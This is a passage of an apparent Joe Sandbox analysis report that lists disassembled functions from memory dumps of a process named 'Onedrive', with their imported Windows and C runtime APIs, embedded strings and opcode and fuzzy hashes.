Instruction Fuzzy Hash: 73519122B08E02E9FF00AB69C5D02BD27A5AB08BA8F504535DE5ED3795CE3CE415C340

Function 00007FF8A0307A30 Relevance: 6.1, APIs: 4, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

__GetCurrentState.LIBCMTD ref: 00007FF8A0307A6A

Part of subcall function 00007FF8A03056B0: __FrameHandler3::StateFromControlPc.LIBVCRUNTIMED ref: 00007FF8A03056E4

__FrameHandler3::SetState.LIBVCRUNTIMED ref: 00007FF8A0307B71
_SetImageBase.LIBVCRUNTIMED ref: 00007FF8A0307C00
__FrameHandler3::SetState.LIBVCRUNTIMED ref: 00007FF8A0307C6D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: State$FrameHandler3::$BaseControlCurrentFromImage
String ID:
API String ID: 380775268-0
Opcode ID: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
Instruction ID: dae0755c9e5a365b7f66205229e46d0443ff203601b19cf0234b667e13c8a748
Opcode Fuzzy Hash: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
Instruction Fuzzy Hash: 9861DD3290AA8696D670DF55E08137AB7A0FBC47C9F204535E68D83B56CF3CD541CB40

Function 00007FF8A0326A90 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
Instruction ID: 1b33fcab1ca8c7b46ae94cc8a69fecdfc2d986553647dd7454395e26f9455d8a
Opcode Fuzzy Hash: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
Instruction Fuzzy Hash: E741F02290EE4296E750EB25E48137EA6A0FBE87C0F505535E78E87B69DF3CD8518B40

Function 00007FF8A03282F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
Instruction ID: 2a7aa40f10a2d8012513437a52b066d601abd81869f81602dafe5808671d1be3
Opcode Fuzzy Hash: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
Instruction Fuzzy Hash: AB41ED26A1EE4396E750AB25E45137EA7A0FBD87C0F100535E78D87BA9DF7CD4418B40

Function 00007FF8A0326C40 Relevance: 6.1, APIs: 4, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
Instruction ID: a91f7bbe1daee45c159ccec095112dcd6317a48ab99427034f78b6f85794a026
Opcode Fuzzy Hash: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
Instruction Fuzzy Hash: 8F410F36A1EE4296E750AB25E54137EA7A0FBE87C0F104536F68D47BA9DF3CD4418B40

Function 00007FF6104F3100 Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

swscanf_s.MSVCRT ref: 00007FF6104F3151
GetGeoInfoW.KERNEL32 ref: 00007FF6104F317D
SysAllocString.OLEAUT32 ref: 00007FF6104F31CC
SysFreeString.OLEAUT32 ref: 00007FF6104F3203

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: String$AllocFreeInfoswscanf_s
String ID:
API String ID: 3357541311-0
Opcode ID: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
Instruction ID: 238b04042286669fc717ae6f52fe72a7f6a412af7570d377326177718e6063ee
Opcode Fuzzy Hash: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
Instruction Fuzzy Hash: 3331B421B0CE82E2EE215B19A5903FDA656AFC9FA5F598034DB4EC7785DF3CE4258700

Function 00007FF6104F5020 Relevance: 6.1, APIs: 4, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

SetupGetStringFieldW.SETUPAPI ref: 00007FF6104F5060
GetLastError.KERNEL32 ref: 00007FF6104F5070

Part of subcall function 00007FF6104F5CEC: GetProcessHeap.KERNEL32 ref: 00007FF6104F5E2B
Part of subcall function 00007FF6104F5CEC: HeapFree.KERNEL32 ref: 00007FF6104F5E3F

GetProcessHeap.KERNEL32 ref: 00007FF6104F5114
HeapFree.KERNEL32 ref: 00007FF6104F5129

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$ErrorFieldLastSetupString
String ID:
API String ID: 2588027753-0
Opcode ID: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
Instruction ID: 699407460a1efd148291d97643d75872d15b3940d32d4790420d9039c163b0ee
Opcode Fuzzy Hash: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
Instruction Fuzzy Hash: A631B331A0CE83E6EE106B2994902BE72A5BF85BA4F554035D74EC7394EE3DE4118780

Function 00007FF6104FE7D0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FF6104FE913
RtlLookupFunctionEntry.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FF6104FE932
RtlVirtualUnwind.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FF6104FE97F
__raise_securityfailure.LIBCMT ref: 00007FF6104FEA64

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
Instruction ID: c0f85b73528e34a3a74a44de2cf3e2931d8337652c9438338586c8c83520557c
Opcode Fuzzy Hash: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
Instruction Fuzzy Hash: D741C639A0CF02A5EE508B19F99036973A4FB88B69FA04135DA8DC3769DF7CE554C710

Function 00007FF6104FA074 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SLOpen.SLC ref: 00007FF6104FA098
SLGenerateOfflineInstallationId.SLC ref: 00007FF6104FA0BB
SLClose.SLC ref: 00007FF6104FA12D
LocalFree.KERNEL32 ref: 00007FF6104FA149

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: CloseFreeGenerateInstallationLocalOfflineOpen
String ID:
API String ID: 3853244748-0
Opcode ID: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
Instruction ID: bcbfb8cf89a1a8102536be2e6d4c399de6c14092d3921fbbc230290cbd5c4085
Opcode Fuzzy Hash: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
Instruction Fuzzy Hash: 15218C61B08F82D6EF009B55A59037DA7A8EB89FE4F048534DA4EC7785DF6CE4258700

Function 00007FF8A0320370 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0320381

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03203D5
DeleteCriticalSection.KERNEL32 ref: 00007FF8A0320427
__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0320465

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CriticalSection__vcrt_lock$Concurrency::details::_DeleteEnterSchedulerScheduler::_
String ID:
API String ID: 27951074-0
Opcode ID: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
Instruction ID: ee64f3cc36945c774025bd62a5a34b846cb3b313ffd23ee4ae510f2e20cfd4ba
Opcode Fuzzy Hash: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
Instruction Fuzzy Hash: E221F125A0AE4796EB30DB19E49133A63A0FB9CBC9F501236DACD477A5DE3DE5058B00

Function 00007FF6104FA170 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SLOpen.SLC ref: 00007FF6104FA194
SLGetTokenActivationGrants.SPPCEXT ref: 00007FF6104FA1BC
SLClose.SLC ref: 00007FF6104FA1FA
SLFreeTokenActivationGrants.SPPCEXT ref: 00007FF6104FA216

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: ActivationGrantsToken$CloseFreeOpen
String ID:
API String ID: 964983634-0
Opcode ID: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
Instruction ID: 0e2540bcb72b2c8708cf6c2494d002b483de07f6e90cf4a6c783473b46b435b0
Opcode Fuzzy Hash: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
Instruction Fuzzy Hash: 54216A62B08A42D6EF144B59E590379AAA4FB8AFA4F168131DA0EC3354CF3DE8608701

Function 00007FF8A03286F0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF8A0328734
GetLastError.KERNEL32 ref: 00007FF8A0328745
_dosmaperr.LIBCMTD ref: 00007FF8A032874D
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A03287A0

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Container_base12Container_base12::~_ErrorFileLastModuleName_dosmaperrstd::_
String ID:
API String ID: 2518310752-0
Opcode ID: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
Instruction ID: 7b0fc8e229f6ec850cd2cac8ce88457aa79b2a30604b5d6e2a56002f35fa356b
Opcode Fuzzy Hash: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
Instruction Fuzzy Hash: 69117F32A1AA82A6E760EB24E4453AF77A0FB983C4F401135F68E46B69DF7CD144CF40

Function 00007FF8A0304210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Strings

D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00007FF8A03042C7

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
API String ID: 0-277556848
Opcode ID: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
Instruction ID: a593c7c8c647c18928dddfcde21b23fd70f86da6b72a1c5577c4b8b9a559e3a6
Opcode Fuzzy Hash: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
Instruction Fuzzy Hash: 07414A61A2FD43B1E650EB94E8503BAA265FF903D4F601231F29E427E6DF6CE6148B40

Function 00007FF8A030AC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030ACE4

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 0-3378279506
Opcode ID: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
Instruction ID: 8bf4f4bd14e4aad1c2c29d8e3c02d390ee4dc928627c69a806954e51bb278d5d
Opcode Fuzzy Hash: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
Instruction Fuzzy Hash: C431502151EF8291EA20DB55F05036E77A0FB85BD4F600232F6DD86BDADF2CD5018B40

Function 00007FF8A030AAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030ABA1

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 0-3378279506
Opcode ID: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
Instruction ID: ce43a5886182666fa44fc71b59737b00803a478207d9ebbebf95333f48e1c48c
Opcode Fuzzy Hash: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
Instruction Fuzzy Hash: D7315E2191EF82A1EA20DB55F04136E77A5EB857E4F600231F6ED467E5CF2CD5018B40

Function 00007FF8A0308480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8A030853A
RaiseException.KERNEL32 ref: 00007FF8A03085AC

Strings

csm, xrefs: 00007FF8A03085A7

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
Instruction ID: ae793ebbb45dcac34ad3a2da9c3e748795c81b39f1b8944ce548f4f6d97d4e31
Opcode Fuzzy Hash: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
Instruction Fuzzy Hash: 1E31D03621AF8986DBA08F59F88031AB7A4F389B94F504225EBCD47B68DF7CC554CB00

Function 00007FF8A0319160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 00007FF8A0319202

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
API String ID: 0-2685728405
Opcode ID: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
Instruction ID: 4bbf8fd56214124bebe84b572c72056c54c075eaff21a7b47708ae59c1a17d1c
Opcode Fuzzy Hash: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
Instruction Fuzzy Hash: A421342261DE86A2DE50CB15F44025AB3A4FBC47E0F500731F6AE46BE9DF7CD1508B00

Function 00007FF6104F18A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,00000002,00000000,00007FF6104F1624), ref: 00007FF6104F18D7
CompareStringW.KERNEL32 ref: 00007FF6104F1901

Strings

ParentWindowHandle, xrefs: 00007FF6104F18E8

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: CharCompareNextString
String ID: ParentWindowHandle
API String ID: 42738925-3107191162
Opcode ID: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
Instruction ID: 78a379569cd7570f8968037b89568d0938fb7bd7cdcc779b1f8b926c9480b808
Opcode Fuzzy Hash: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
Instruction Fuzzy Hash: 6911AE72A08F41D2EA109B19E480469BBA8FB85FE0F094231DA9DC73B4CF78E452C780

Function 00007FF8A033E410 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_handle_error.LIBCMTD ref: 00007FF8A033E4B0
_handle_error.LIBCMTD ref: 00007FF8A033E510

Strings

!, xrefs: 00007FF8A033E4E6

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _handle_error
String ID: !
API String ID: 1757819995-2657877971
Opcode ID: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
Instruction ID: 283c2246af4fbea83754a7757a13ac7446cbdb07e1688672fd8c089f3be3bb6d
Opcode Fuzzy Hash: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
Instruction Fuzzy Hash: 1921E676918FC68AD361CF20E49435BB761FBDA394F10531AE6C91AA59EFBDD0848F00

Function 00007FF6104FC094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FBF50: FindResourceExW.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBF89
Part of subcall function 00007FF6104FBF50: LoadResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFA6
Part of subcall function 00007FF6104FBF50: LockResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFBA

CoTaskMemAlloc.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC0DE
memmove.MSVCRT(?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC0FF

Strings

ComplianceText, xrefs: 00007FF6104FC0A8

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Resource$AllocFindLoadLockTaskmemmove
String ID: ComplianceText
API String ID: 2400272053-346262819
Opcode ID: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
